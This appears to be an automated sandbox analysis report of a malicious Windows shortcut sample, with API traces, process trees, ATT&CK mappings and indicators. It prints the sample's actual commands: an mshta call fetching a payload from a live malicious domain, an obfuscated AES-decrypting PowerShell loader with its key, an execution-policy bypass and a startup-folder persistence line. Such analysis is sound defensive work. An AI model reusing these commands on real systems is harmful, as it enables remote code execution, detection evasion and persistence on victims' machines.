Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0C0A00 BlockInput,14_2_00007FF74D0C0A00
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0337B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,14_2_00007FF74D0337B0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D055BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,14_2_00007FF74D055BC0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D036D1C LoadLibraryA,GetProcAddress,14_2_00007FF74D036D1C
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D09CDC4 GetProcessHeap,HeapAlloc,InitializeAcl,14_2_00007FF74D09CDC4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D06AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00007FF74D06AF58
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D078FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00007FF74D078FE4
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0559C8 SetUnhandledExceptionFilter,14_2_00007FF74D0559C8
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0557E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00007FF74D0557E4
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A4A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00A4A385
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A4A354 SetUnhandledExceptionFilter,21_2_00A4A354
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F3A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00F3A385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F3A354 SetUnhandledExceptionFilter,27_2_00F3A354

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D09CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,14_2_00007FF74D09CE68
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0337B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,14_2_00007FF74D0337B0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D054514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,14_2_00007FF74D054514
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0C4C58 GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,14_2_00007FF74D0C4C58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/duydemo
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($VGARXd){return -split ($VGARXd -replace '..', '0x$& ')};$DLBqcOk = clean('[hex-encoded ciphertext removed]');$fgNcqNX = [System.Security.Cryptography.Aes]::Create();$fgNcqNX.Key = clean('764F4D5163617754716D4B6C6E447878');$fgNcqNX.IV = New-Object byte[] 16;$ckcAaXbLZ = $fgNcqNX.CreateDecryptor();$lGOPfxpiP = [Text.Encoding]::UTF8.GetString($ckcAaXbLZ.TransformFinalBlock($DLBqcOk, 0,$DLBqcOk.Length)); & $lGOPfxpiP.Substring(0,3) $lGOPfxpiP.Substring(3)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\test.pdf"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\BFmcYQ.exe "C:\Users\user\AppData\Roaming\BFmcYQ.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function clean ($vgarxd){return -split ($vgarxd -replace '..', '0x$& ')};$dlbqcok = clean('[hex-encoded ciphertext removed]');$fgncqnx = [system.security.cryptography.aes]::create();$fgncqnx.key = clean('764f4d5163617754716d4b6c6e447878');$fgncqnx.iv = new-object byte[] 16;$ckcaaxblz = $fgncqnx.createdecryptor();$lgopfxpip = [text.encoding]::utf8.getstring($ckcaaxblz.transformfinalblock($dlbqcok, 0,$dlbqcok.length)); & $lgopfxpip.substring(0,3) $lgopfxpip.substring(3)
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D09C5FC GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,14_2_00007FF74D09C5FC
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D09D540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,14_2_00007FF74D09D540
Source: powershell.exe, 00000007.00000002.1656137707.000001EE1AF23000.00000004.00000800.00020000.00000000.sdmp, BFmcYQ.exe, 0000000E.00000000.1574664212.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp, Guard.exe, 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: BFmcYQ.exe, Guard.exe, SwiftWrite.pifBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D06FD20 cpuid 14_2_00007FF74D06FD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D092BA0 GetLocalTime,14_2_00007FF74D092BA0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D092BCF GetUserNameW,14_2_00007FF74D092BCF
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D072650 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,14_2_00007FF74D072650
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D051D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,14_2_00007FF74D051D80
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: powershell.exe, 00000013.00000002.2031671989.0000026D3654E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Users\Public\Guard.exe
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1E676000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Users\Public\Guard.exe
Source: Guard.exe, 00000015.00000002.2643432226.0000000000BB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume3\Users\Public\Guard.exe
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1E676000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Public\Guard.exe
Source: powershell.exe, 00000013.00000002.2027661393.0000026D36328000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2031671989.0000026D3652D000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000003.1753080999.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000015.00000003.1753191048.0000000004401000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000003.1744211015.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000015.00000003.1749943273.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000015.00000003.1739343143.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000015.00000003.1748892139.0000000004401000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000003.1730675513.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000015.00000003.1749314000.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000015.00000003.1730390057.0000000004500000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Guard.exe
Source: BFmcYQ.exe, 0000000E.00000002.1668946917.0000019AF6E48000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2031671989.0000026D3654E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1778186746.0000026D1E676000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1778186746.0000026D1E158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2027661393.0000026D362B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2031671989.0000026D3652D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1774716962.0000026D1C209000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, Guard.exe, 00000015.00000002.2642630373.00000000009BF000.00000004.00000010.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.0000000003902000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2642630373.00000000009CF000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: C:\Users\Public\Guard.exe
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1E676000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \Users\Public\Guard.exe
Source: SwiftWrite.pifBinary or memory string: WIN_81
Source: SwiftWrite.pifBinary or memory string: WIN_XP
Source: SwiftWrite.pifBinary or memory string: WIN_XPe
Source: SwiftWrite.pifBinary or memory string: WIN_VISTA
Source: BFmcYQ.exe.7.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: SwiftWrite.pifBinary or memory string: WIN_7
Source: SwiftWrite.pifBinary or memory string: WIN_8
Source: SwiftWrite.pif.21.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0C4074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,14_2_00007FF74D0C4074
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0C3940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,14_2_00007FF74D0C3940
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A9696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,21_2_00A9696E
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A96E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,21_2_00A96E32
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F8696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,27_2_00F8696E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F86E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,27_2_00F86E32
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 1 Scripting | 2 Valid Accounts | 2 Native API | 1 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 3 PowerShell | 2 Valid Accounts | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 21 Input Capture | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 37 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 23 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 12 Process Injection | 231 Masquerading | LSA Secrets | 151 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 2 Valid Accounts | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 13 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
Behavior Graph ID: 1577872 | Sample: s4PymYGgSh.lnk | Startdate: 18/12/2024 | Architecture: WINDOWS | Score: 100

s4PymYGgSh.lnk
  Signatures: Malicious sample detected (through community Yara rule); Windows shortcut file (LNK) starts blacklisted processes; Sigma detected: Drops script at startup location; 12 other signatures
  DNS/IP: tiffany-careers.com; x1.i.lencr.org; nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
  forfiles.exe (started)
    Signatures: Windows shortcut file (LNK) starts blacklisted processes
    conhost.exe (started)
    powershell.exe (started)
      Signatures: Windows shortcut file (LNK) starts blacklisted processes; Drops PE files to the user root directory; Powershell drops PE file
      mshta.exe (started)
        Signatures: Windows shortcut file (LNK) starts blacklisted processes; Suspicious powershell command line found
        DNS/IP: tiffany-careers.com 147.45.49.155, 443, 49716, 49742 FREE-NET-ASFREEnetEU Russian Federation
        Dropped: C:\Users\user\AppData\Local\...\duydemo[1], PE32
        powershell.exe (started)
          Signatures: Binary is likely a compiled AutoIt script file
          Dropped: C:\Users\user\AppData\Roaming\BFmcYQ.exe, PE32+
          conhost.exe (started)
          Acrobat.exe (started)
            AcroCEF.exe (started)
              AcroCEF.exe (started)
          BFmcYQ.exe (started)
            Signatures: Windows shortcut file (LNK) starts blacklisted processes; Multi AV Scanner detection for dropped file; Suspicious powershell command line found; 2 other signatures
            Dropped: C:\Users\Public\PublicProfile.ps1, ASCII
            powershell.exe (started)
              Dropped: C:\Users\Public\Secure.au3, Unicode
              conhost.exe (started)
              Guard.exe (started)
                Signatures: Windows shortcut file (LNK) starts blacklisted processes; Drops PE files with a suspicious file extension
                Dropped: C:\Users\user\AppData\...\SwiftWrite.pif, PE32
                Dropped: C:\Users\user\AppData\Local\...\SwiftWrite.js, ASCII
                cmd.exe (started)
                  Dropped: C:\Users\user\AppData\...\SwiftWrite.url, MS
                  conhost.exe (started)
            powershell.exe (started)
              DNS/IP: 139.99.188.124, 49766, 49795, 80 OVHFR Canada
              Dropped: C:\Users\Public\Guard.exe, PE32
              conhost.exe (started)
  wscript.exe (started)
    Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
    SwiftWrite.pif (started)
  svchost.exe (started)
    DNS/IP: 127.0.0.1 unknown unknown

No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\Public\Guard.exe | 8% | ReversingLabs | | |
| C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | 8% | ReversingLabs | | |
| C:\Users\user\AppData\Roaming\BFmcYQ.exe | 33% | ReversingLabs | Win64.Downloader.Generic | |
No Antivirus matches
No Antivirus matches
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high |
| tiffany-careers.com | 147.45.49.155 | true | true | | unknown |
| x1.i.lencr.org | unknown | unknown | false | | high |
| nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | unknown | unknown | false | | high |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://tiffany-careers.com/test.pdf | false | Avira URL Cloud: safe | unknown |
| https://tiffany-careers.com/duydemo | true | Avira URL Cloud: safe | unknown |
| http://139.99.188.124/hvshp | true | Avira URL Cloud: safe | unknown |
| http://139.99.188.124/EsgMle.txt | true | Avira URL Cloud: safe | unknown |
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 139.99.188.124 | unknown | Canada | 16276 | OVHFR | true |
| 147.45.49.155 | tiffany-careers.com | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | true |

| IP |
|---|
| 127.0.0.1 |
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1577872
                                                Start date and time:2024-12-18 20:54:11 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 10m 12s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:29
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:s4PymYGgSh.lnk
                                                renamed because original name is a hash value
                                                Original Sample Name:f2d11d2f41fe0c5b667ddc0cdde9b149.lnk
                                                Detection:MAL
                                                Classification:mal100.expl.evad.winLNK@41/73@8/3
                                                EGA Information:
                                                • Successful, ratio: 50%
                                                HCA Information:
                                                • Successful, ratio: 99%
                                                • Number of executed functions: 96
                                                • Number of non-executed functions: 278
                                                Cookbook Comments:
                                                • Found application associated with file extension: .lnk
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.218.208.109, 23.193.114.26, 23.193.114.18, 172.64.41.3, 162.159.61.3, 23.218.208.137, 34.237.241.83, 54.224.241.105, 18.213.11.84, 50.16.47.176, 2.20.77.60, 2.20.68.228, 2.20.68.207, 13.107.246.63, 4.245.163.56, 52.6.155.20, 23.217.172.185
                                                • Excluded domains from analysis (whitelisted): chrome.cloudflare-dns.com, e4578.dscg.akamaiedge.net, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, armmf.adobe.com, azureedge-t-prod.trafficmanager.net, geo2.adobe.com
                                                • Execution Graph export aborted for target mshta.exe, PID 7892 because there are no executed functions
                                                • Execution Graph export aborted for target powershell.exe, PID 7396 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 8128 because it is empty
                                                • Not all processes were analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: s4PymYGgSh.lnk
                                                Time      Type             Description
                                                14:55:25  API Interceptor  2x Sleep call for process: svchost.exe modified
                                                14:55:26  API Interceptor  1x Sleep call for process: mshta.exe modified
                                                14:55:29  API Interceptor  95x Sleep call for process: powershell.exe modified
                                                14:55:46  API Interceptor  2x Sleep call for process: AcroCEF.exe modified
                                                14:56:31  API Interceptor  1395x Sleep call for process: Guard.exe modified
                                                14:56:57  API Interceptor  84x Sleep call for process: SwiftWrite.pif modified
                                                20:55:58  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.7067211677773397
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqh:2JIB/wUKUKQncEmYRTwh0d
                                                                                        MD5:DAB844C9ADAB2210C28C3FB36D0B0E48
                                                                                        SHA1:D0231C8C0A16C4E832462BF91E76C31A048968B2
                                                                                        SHA-256:BD06D426500D91AC0FE63D17F7344617B9A5F1F386BE6B93B5DB9BE8AA3CE3CD
                                                                                        SHA-512:4DF2FD98F77F5BAC1809C9C5ABBFC75C491758B7D05D006A714CDCD0ACA2CC7318EFCEAE5342E4E8E1B7440941342D244CEB25E91EFFAC3F845C95BD8B510E86
                                                                                        Malicious:false
                                                                                        Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x82bae8ed, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.7900082947152514
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:jSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:jazaPvgurTd42UgSii
                                                                                        MD5:FA3B37A0BDB386B13C36A9E8F328D0C6
                                                                                        SHA1:8BF7CC992349F341476977D80E5AFA6922711127
                                                                                        SHA-256:B74228DCA588F0A354969EE685FFA981B009CD83B7B78B715F7A74FDBE9EEC32
                                                                                        SHA-512:260765213C5FA22E20A8DA9A8BE021032882012A0AA316BD21CD6AEBB8F2D064C8C75044C87C4C97C2F0877D72D72F6A521C44582C23CFC04357B3B845DCB354
                                                                                        Malicious:false
